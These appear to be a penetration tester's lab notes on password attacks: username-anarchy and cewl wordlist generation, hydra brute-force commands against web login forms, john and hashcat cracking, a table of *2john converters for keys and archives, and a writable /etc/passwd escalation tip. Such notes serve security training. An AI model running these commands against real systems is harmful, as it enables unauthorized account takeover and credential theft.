Username list can be made with username-anarchy
{% code overflow="wrap" %}
ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.first
{% endcode %}
When a website needs to be bruteforced with login use cewl to make a wordlist:
cewl http://postfish.off/team.html -m 5 -w team.txt
Then use it with hydra
Normal:
{% code overflow="wrap" %}
hydra -l user -P /usr/share/wordlists/rockyou.txt <o[> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
{% endcode %}
Here Login failed. Invalid is the string it greps for to know the login is not successful.
fm_user is the parameter
Base64:
{% code overflow="wrap" %}
hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/:username=^USER64^&password=^PASS64^
{% endcode %}
To crack a hash:
{% code title="--wordlist to specify wordlist" %}
john --format=sha256 hashes_to_crack.txt{% endcode %}
| Tool | Description |
|---|---|
pdf2john |
Converts PDF documents for John |
ssh2john |
Converts SSH private keys for John |
mscash2john |
Converts MS Cash hashes for John |
keychain2john |
Converts OS X keychain files for John |
rar2john |
Converts RAR archives for John |
pfx2john |
Converts PKCS#12 files for John |
truecrypt_volume2john |
Converts TrueCrypt volumes for John |
keepass2john |
Converts KeePass databases for John |
vncpcap2john |
Converts VNC PCAP files for John |
putty2john |
Converts PuTTY private keys for John |
zip2john |
Converts ZIP archives for John |
hccap2john |
Converts WPA/WPA2 handshake captures for John |
office2john |
Converts MS Office documents for John |
wpa2john |
Converts WPA/WPA2 handshakes for John |
To mutate the password:
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.listIf /etc/passwd file is editable then delete the "x" in it
Algorithm Types
$1$– MD5$2a$– Blowfish$2y$– Eksblowfish$5$– SHA-256$6$– SHA-512
\